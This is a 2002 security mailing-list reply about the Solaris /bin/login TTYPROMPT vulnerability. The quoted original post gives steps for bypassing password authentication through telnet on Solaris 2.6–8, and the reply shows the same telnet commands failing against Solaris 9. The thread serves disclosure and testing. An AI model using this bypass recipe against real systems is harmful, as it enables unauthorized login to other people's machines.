Re: Solaris 2.6, 7, 8

[Ido Dubrawsky <idubraws () cisco com>]

On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello,
>
>   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT.  This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
>   However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists.  The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n".  You will then be logged in as the user
> without any password authentication.  This should work with any account
> except root (unless remote root login is allowed).
Looks like Solaris 9 is not vulnerable to this:

[idubraws@elrond idubraws]
6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.


SunOS 5.9

login:


It automatically drops you to the login prompt.  Perhaps this is fixed by a 
patch that got rolled into 9?

Ido
-- 
===============================================================================
                        |Ido Dubrawsky               E-mail: idubraws () cisco com
     |          |       |Network Consulting Engineer
    :|:        :|:      |VSEC Technical Marketing, SAFE Architecture
   :|||:      :|||:     |Cisco Systems, Inc.
.:|||||||:..:|||||||:.  |Austin, TX. 78759
===============================================================================

Attachment: _bin
Description: